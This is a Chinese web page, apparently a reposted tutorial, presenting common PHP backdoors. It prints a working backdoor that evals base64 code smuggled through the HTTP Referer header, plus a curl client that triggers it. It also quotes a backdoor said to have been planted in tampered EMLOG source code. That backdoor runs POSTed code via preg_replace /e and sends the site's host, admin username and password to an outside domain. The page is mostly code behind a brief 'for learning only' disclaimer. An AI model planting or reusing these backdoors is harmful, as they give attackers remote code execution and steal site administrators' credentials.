您现在的位置是:网站首页> 编程资料编程资料
一些常见的PHP后门原理分析_脚本攻防_网络安全_
                     2023-05-24
                528人已围观
                
                2023-05-24
                528人已围观
            
简介 一些常见的PHP后门原理分析_脚本攻防_网络安全_
本地测试结果如下图。 
本程序只作为学习作用,请勿拿去做坏事。 
复制代码
代码如下://1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<
phpinfo(); 
CODE; 
//进行base64编码 
$code = base64_encode($code); 
//构造referer字符串 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; 
//后门url 
$url = 'http://localhost/test1/1.php'; 
$ch = curl_init(); 
$options = array( 
CURLOPT_URL => $url, 
CURLOPT_HEADER => FALSE, 
CURLOPT_RETURNTRANSFER => TRUE, 
CURLOPT_REFERER => $referer 
); 
curl_setopt_array($ch, $options); 
echo curl_exec($ch); 

最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码
复制代码
代码如下:if (isset($_GET["rsdsrv"])) {
if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){
@preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");
}
}
file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));
相关内容
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日_脚本攻防_网络安全_
- XSS攻击常识及常用脚本 _脚本攻防_网络安全_
- PHP的一个EVAL的利用防范_脚本攻防_网络安全_
- PHP脚本木马的高级防范经验_脚本攻防_网络安全_
- thinkphp代码执行getshell的漏洞解决_脚本攻防_网络安全_
- web后门 那些强悍猥琐流的PHP一句话后门大全分享_脚本攻防_网络安全_
- Linux 下多种编程语言的反弹 shell 方法_脚本攻防_网络安全_
- Dedecms最新注入漏洞分析及修复方法_脚本攻防_网络安全_
- SQL注入黑客防线网站实例分析_脚本攻防_网络安全_
- 利用WMI打造完美三无后门(scrcons.exe)_脚本攻防_网络安全_
 
                                
                                                         
                                
                                                         
                                
                                                         
 
    